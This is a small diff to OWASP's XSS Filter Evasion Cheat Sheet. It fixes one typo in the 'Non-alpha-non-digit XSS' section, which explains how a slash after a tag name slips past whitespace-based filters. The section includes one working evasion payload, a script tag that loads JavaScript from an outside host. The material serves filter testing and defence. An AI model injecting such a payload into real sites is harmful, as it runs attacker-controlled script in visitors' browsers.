OWASP/CheatSheetSeries/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md

 ### Non-alpha-non-digit XSS

-The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag.
+The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag.
 The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace.
 For example `\<SCRIPT\\s` != `\<SCRIPT/XSS\\s`:

 `<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>`